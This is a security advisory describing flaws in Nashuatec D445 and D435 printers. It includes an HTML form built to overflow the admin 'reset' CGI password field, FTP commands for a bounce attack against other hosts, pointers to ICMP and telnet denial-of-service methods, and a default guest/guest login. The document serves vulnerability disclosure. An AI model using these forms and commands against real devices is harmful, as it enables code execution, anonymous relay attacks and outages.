Vulnerability

    NASHUATEC D445 and D435

Affected

    NASHUATEC D445 printer

Description

    Gregory Duchemin found following.   The NASHUATEC D445 printer  is
    vulnerabled to many  attacks.  There  are 4 communs  services that
    run in  a standard  configuration: httpd,  ftpd, telnetd, printer.
    (tested with nmap).  Same applies to D435.

    First, it's possible to configure  remotly the server via its  own
    admin web server (port 80).  Naturaly the server will ask you  for
    an  admin  password  before  submiting  the  form to the cgi.  The
    password field is 15 chars  length but an intruder with  a lightly
    modified copy  of the  original form  will be  able to submit many
    more chars (about 260 will be enough for the test) to the cgi  and
    produce  a  buffer  overflow  (see  the  example  below).  The cgi
    concerned is "reset",  but we can  suppose, every cgi  are exposed
    to  this  problem.   If  our  intruder  decide  to forge a special
    password  with  instruction  code  inside  he'll  force the remote
    printer to  execute code  with the  target web  server priviledge.
    Attacker form example:

        <HTML>
        <HEAD>
        <TITLE>Nashuadeath</TITLE>
        </HEAD>
        <!-- Gregory Duchemin Aka c3rber -->
        <!-- NEUROCOM -->
        <!-- http://www.neurocom.com -->
        <!-- 179/181 Avenue Charles de Gaulle -->
        <!-- 92200 Neuilly Sur Seine  -->
        <!-- Tel: 01.41.43.84.84	Fax: 01.41.43.84.80 -->
        <BODY>
        <HR>
        <CENTER><FONT SIZE=+2><big><B>NIB
        450-E</B></big></FONT></CENTER>
        <HR>
        <CENTER><FONT SIZE=+2>Unit Serial Number
        599132</FONT></CENTER>
        <HR>
        <H2><CENTER>Reset Unit</H2>
        <HR>
        <FORM ENCTYPE="x-www-form-encoded" METHOD="POST"
        ACTION="http://victim-printer-ip/Forms/reset">
        <B>A very big password is required to perform this function
        ( at least 260 chars length ).</B><BR>
        <BR>
        <INPUT TYPE="text" NAME="http_pwd" SIZE="100"
        MAXLENGTH="1500">
        <BR>
        <BR>
        <INPUT TYPE="SUBMIT" NAME="Submit" VALUE="T3st M3 PL3ase">
        </FORM>
        <P>
        <HR>
        <P>
        <CENTER>[ <A HREF="/index">Home</A> | <A HREF="/info">Unit
        Info</A> ]
        </CENTER>
        </BODY>
        </HTML>

    Another flaw is present in the ftp daemon that permit the infamous
    "bounce attack".

        ftp printer.victim.com
        user xxxxx
        pass xxxxx
        quote port a1,a2,a3,a4,0,25

    a1.a2.a3.a4 is  every other  ip adress.   The ftp  server  doesn't
    check  neither  the  type  of  port  in  the  request (< 1024 =
    administrative port) nor the ip  adress used.  So an  intruder may
    use the service to attack some ohter boxes anonymously.

    The last one is  a denial of service  with an icmp redirect  storm
    against the printer  ip stack.   Use winfreez.c to  test it.   The
    printer 'll not respond anymore during the attack.  winfreez.c  is
    available at:

        http://oliver.efri.hr/~crv/security/bugs/NT/kernel48.html

    Here's update:

    - By default, a  "guest" account (password guest)  allow everybody
      to  authenticate  himself  to  the  telnet  service.  That's not
      exactly what we should call a security hole since everybody  can
      connect to the web server  with exactly the same priviledge  and
      with out any needed authentication.
    - the telnetd daemon no longer  listen on its port after only  one
      syn stealth scan (try nmap "-sS" option).  This behavior suggest
      that this version  of telnetd is  unable to manage  simultaneous
      connection requests resulting in a possible denial of service at
      tack.

Solution

    Nothing yet.